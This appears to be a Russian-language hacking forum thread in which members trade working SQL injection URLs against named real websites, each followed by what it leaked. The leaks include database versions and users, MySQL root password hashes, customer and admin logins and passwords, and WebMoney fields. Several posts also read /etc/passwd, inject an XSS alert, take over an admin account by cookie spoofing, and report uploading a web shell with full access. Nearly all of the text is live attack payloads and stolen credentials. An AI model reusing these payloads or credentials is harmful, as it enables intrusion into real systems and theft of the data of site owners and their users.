http://cinema.variety.ru/actors.php?cid=1&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13/* 4.0.27-standard-log/variety_dvd/variety_dvd@localhost ------------------------------------------------------------------- http://www.semenovsky.ru/?pageId=124&newsId=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1/* 5.0.44-log/semenovskiy/semenovskiy@localhost http://www.semenovsky.ru/?pageId=124&newsId=-1+union+select+1,2,concat_ws(0x2F,table_name,column_name),4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1+from+information_schema.columns/* доступ к information_schema ------------------------------------------------------------------ http://www.vremea.net/index.php?content=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5/* 4.0.27-standard/vremea_vremea/vremea@localhost ------------------------------------------------------------------ na-dosuge.dp.ua http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,version(),database(),user())/* 5.0.27/price/dprice@localhost http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,name,pass,email)+from+_rat+limit+0,1/* имя/пароль/мейл prod/2503919/[email protected] http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,customers_firstname,customers_password)+from+customers+limit+3,1/* имя\хеш с солью А это их казино http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,login,pass,wm)+from+casino_uwed+limit+0,1/* логин/пароль/WebMoney наверно кошелек http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,login,pass,wm)+from+casino_wm+limit+1,1/* Эти таблицы пустые ))) (за исключением тестовых юзверей). Сайт сырой и казино будет попозже )
vsekiden.com - похоже на БТА - Болгарское Телевизионное Агенство Code: http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/* 5.0.32-Debian_7etch1-log:vsekiden:vsekiden@localhost 81 таблица: Code: http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+80,1/* root: Code: http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,concat_ws(0x3a,User,Password),3,4,5,6,7,8,9,10+from+mysql.user/* root:*CCBD21CD8E1C871D9C7F996760C867CC31F4830F Интересные табы: newvd_users, cgp133_users, cgp133_ecards
www.weltexpress.info Code: http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+concat_ws(0x3a,version(),database(),user())/* 5.0.24-DEBIAN_3-LOG:WELTEXPRESS:WELTEXPRESS@LOCALHOST 35 таблиц: Code: http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+table_name+from+information_schema.tables+limit+34,1/* Нашёл таблицу USER, посмотрел её схему: PHILBERL-1.USER и WELTEXPRESS.USER Есть поля USER и PWD, но данные вывести не получилось... Требуется подсказка. Ещё есть таблицы C_USERS и KALASCHNIKOW. В последней из них есть любопытные поля: UNIXDATA, PASSWORD, BN_NAME... Но с выводом данных - проблема.
Проблема от того, что бажная пага коннектится от юзера Weltexpress, а найденные тобой табы принадлежат другим юзерам... Вот и не получается организовать вывод, т.к. в схеме твоего пользователя этих таб нету.
fRg, вот смотри - при инъекции иногда полезно бывает просматривать поле table_schema, чтобы видеть в какой схеме находится интересующая нас таблица, иначе, как в твоём случае, есть шанс, что текущему пользователю не хватит прав на доступ к ней. Вот пример: Он выводит: Легко убедиться, что наш юзер это WELTEXPRESS, а таблица WISSENSCHAFT_KALASCHNIKOW находится в схеме пользователя PHILBERL-1.
там таблицы такой нет, ты from забыл lib.uci.edu http://www.lib.uci.edu/partners/index.php?page=eresearch в поле Premium access: Code: Partner ID') OR 1=(SELECT TOP 1 PASSWORD FROM USERS)-- SYSTEM_USER: PartnersPublic DB_NAME: partners version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) User: PartnersPublic hash:fd6df34ee4e7642c02ced6012028f6b8
Плохо искал: Code: http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,concat(login,0x3a,password),5,6%20from%20gm_users/*
HTML: http://losev-library.ru/index.php?pid=-3271+UNION+SELECT+1,concat(user,0x3b,password)+from+mysql.user+limit+1,3/* БД скул >5 сори поправочка HTML: http://losev-library.ru/index.php?pid=-3271+UNION+SELECT+1,concat(us_id,0x3a,us_name,0x3a,us_pass,0x3a,us_perm,0x3a,us_descr)+from+us/* админка HTML: http://losev-library.ru/nav/index.php?pid=64 залил шелл порыл дальше вообще прикол... практически везде фулл доступ....хоть папку виндоус стирай......
известный мобильный ресурс amobile.ru HTML: http://www.amobile.ru/news/news.php?nid=1880%20union%20select%201,2,3,4+from+news/* сдесь не нашёл никакой таблицы кроме news может кто ещё что нить увидит далее все ресурсы этого портала. Портал мобильных развлечений HTML: http://www.funs.ru/news/news.php?nid=-100%20union%20select%201,2,concat(user,0x3a,password),4+from+mysql.user/* Новости цифровой фотографии HTML: http://www.aphoto.ru/news/news.php?nid=-23%20union%20select%201,2,3,4/* если админа подберём мона нахаляву покачать )
rbcob.ru - Региональная Баннерная Сеть "Омский Баннер" Code: http://www.rbcob.ru/news_body.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6/* 4.0.27-standard:globalom_ob:globalom_ob@localhost rabotaomsk.ru - работа в Омске Code: http://www.rabotaomsk.ru/firmnews/news_body.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.0.27-standard : omck_firmnews : omck_firmnews@localhost business.su - Деловой портал СНГ Code: http://www.business.su/kat.php?goroda=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/* 4.0.27-standard : omck_firmnews : omck_firmnews@localhost До таблиц пока не докопался...
Гыгы. заюзал сплоит Don Dork'a Links MOD v1.2.2 PHPBB Хешики тут: Code: http://www.cats-house.com/links.php?t=search&search_keywords=asd&start=1+UNION+SELECT+1,username,user_password,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*
fondsk.ru - Фонд Стратегической Культуры Code: http://fondsk.ru/articlelist.php?section_id=-1+union+select+concat_ws(0x3a,version(),database(),user())/* 4.0.26-log:u32888:[email protected] yaleherald.com Code: http://www.yaleherald.com/section.php?Section=2&Issue=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.22-standard:yherald_com:yherald@localhost
Code: http://blog.pmaster.net/post.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/* http://blog.pmaster.net/post.php?id=-1+union+select+1,char(0x3c,0x73,0x63,0x72,0x69,0x70,0x74,0x3e,0x61,0x6c,0x65,0x72,0x74,0x28,0x27,0x41,0x4e,0x54,0x49,0x43,0x48,0x41,0x54,0x27,0x29,0x3c,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x3e),3,4,5,6,7,8,9,10,11/*
http://www.level.ru/ - Интернет магазин "Левел" Версия: 4.0.18 Юзер: root@localhost Mysql users Code: root:27ad7c3446c9d3dd root:7e9607db022e3f71 freenibs:565491d704013245 for_shop_2:4ccee85a3015e2d6 Dimano:320c67895c24eb79 Админы - Админка (как ни странно) - http://www.level.ru/admin Логин: user Пасс: user Юзеры - http://forum.hustleclub.ru/ На форуме стоит Инвиж, в котором присутствует древняя бага - Версия: 5.0.45-log Юзверь: [email protected] IPB Admin: Login: Ajrat Hash: 5fd53bdc4d50e4ffbf65dfc39ff93935 Через подмену куков становимся админами p.s. Скулю может использовать только зареганный юзверь Аналогично - http://www.oskexpert.ru/ Версия: 4.1.21-log Юзверь: Uwww3191S@localhost IPB Admin: Login: admin Hash: ff6f02484f67bc7990c6bd2eee3f415c
сайт мобильных телефонов http://www.interstar.ua/ HTML: http://www.interstar.ua/mobile/?day_begin=08&mounth_begin=10&year_begin=2007&day_end=07&mounth_end=11&year_end=2007&main_menu=5&id_show=-5403%20union%20select%20login,2,3,4,5,password,7,8+from+users+limit+0,1/* Другая таблица HTML: http://www.interstar.ua/mobile/?day_begin=08&mounth_begin=10&year_begin=2007&day_end=07&mounth_end=11&year_end=2007&main_menu=5&id_show=-5403%20union%20select%20login_member,2,3,4,5,concat(password_member,0x3b,email_member),7,8+from+members+limit+1,1/*
aim-mia.de Code: http://www.aim-mia.de/categories.php?catid=-1+union+select+concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71)),aes_decrypt(aes_encrypt(user(),0x71),0x71)/* 85 таблиц: Code: http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(table_name,0x71),0x71),2+from+information_schema.tables+limit+84,1/* root: Code: http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(USER,0x71),0x71),aes_decrypt(aes_encrypt(PASSWORD,0x71),0x71)+from+MYSQL.USER+limit+0,1/* ROOT:*980166F60E2FA650E7930113CDCA43D3BA726973 Интересные таблицы: JOS_USERS и ADMINBLOCK (есть и другие...)
logobook.ru Code: http://www.logobook.ru/prod_show.php?object_uid=11122009%20or%201=(select%20db_name())-- version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1) system_user: sa db_name: Images emigranty.ru Code: http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),version(),user(),database())+--+ 5.0.22-Debian_0ubuntu6.06.5-log:[email protected]:emigrantyr /etc/passwd Code: http://www.emigranty.ru/letters.php?lid=-38+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),concat_ws(char(58),version(),user(),database())+--+ Code: http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),uLogin,uPass)+from+emg_user+--+ login: rdm password: rdm http://www.emigranty.ru/admin/
